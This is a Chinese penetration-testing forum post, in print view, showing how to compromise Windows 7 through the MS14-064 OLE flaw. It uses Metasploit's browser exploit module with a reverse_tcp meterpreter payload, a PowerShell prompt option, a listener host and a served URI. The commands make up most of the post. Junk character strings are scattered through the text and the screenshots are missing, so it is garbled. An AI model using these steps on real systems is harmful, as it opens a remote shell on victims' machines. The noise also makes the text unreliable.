中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

& G& h2 z5 g( i& _& G% K! A( P 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 . Q5 A- t% k$ R) P Q0 l

' ~* x2 I# z+ V$ r# o5 a3 d

$ ?1 v; d! O( u$ f8 b) J/ V3 K 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ; b9 @) t7 G/ N# l

. X/ }7 Q- `7 m8 m

0 k4 {1 _. a4 ?3 [" U- X9 ] 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp7 S+ p2 }/ C7 Z, Q/ R

e7 ]. s9 l2 `' r! ^1 t

& y; R. K$ @( o2 v             set AllowPowershellPrompt true1 d' L0 e+ L9 o3 g+ T) q4 c

, \% K) P/ }+ u' |

; C# T- w; ] W. z/ R* ^             Set LHOST 192.168.0.109 : F- O" ]# |' E [

7 d' {0 ~0 T9 K# X

4 r, k* u; S' w4 z+ g' L# p             set SRVHOST 192.168.0.109* ?# Q; _; z5 u( d2 ]

: r* E9 G/ D! g8 }9 C3 Z6 d

& I; E! G8 m( t             Set uripath share; e, E" K& x0 V G* d

0 c. t2 V" b- s4 V7 ?" L

+ {2 V" @4 {* P             Set srvport 80 ]& `; ?- F. H" `* t h( z

$ j# |" {/ k# z9 Y! P' Q. c

6 F) A# G7 `* y   $ P5 `- s' {3 S/ d

4 g# c+ a0 y/ Q e

! p f# ^* h* ?9 `+ ^; N) h) \   4 _% z( l6 G' d: a' B% c7 |+ ?$ s

2 [2 h# V. L5 z* Q! x* [& P+ N

- c( i" s/ N- V$ x' d# l- _! \% k& ]  6 L* z7 f1 w3 b$ o% K I8 z( [ g

o' S7 j9 ]' T& i8 G* }

: C% @, A1 I& `! U6 o8 x4 s  2 x8 q4 r, |7 w; J @5 T6 K

2 t5 h0 G2 R6 }

9 v, g' b N X' l3 e   8 @8 w' x2 u0 [- i3 w/ ~& O

( _1 O6 b6 R9 s& Q) }5 t) b

6 E' W2 }) ~+ P4 y k 下面我们来访问本地地址如图:, S4 d2 y; E: j! ~6 p

5 s$ p) Z0 ]) a3 a' J/ v, h

, D- F/ E. [- K" b) q* o# y8 P  7 |) n. S( k8 D) ]

+ o9 v6 L z P' C, t& \

8 {: ^8 q1 M, a( O  ; V/ {! M B" D! h4 D3 \! g9 u

( Z/ z1 o9 B! D# v7 U, M# l% I

. Q2 G1 B* ]) D# m 0 O0 ?8 L" m9 H( i: I





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2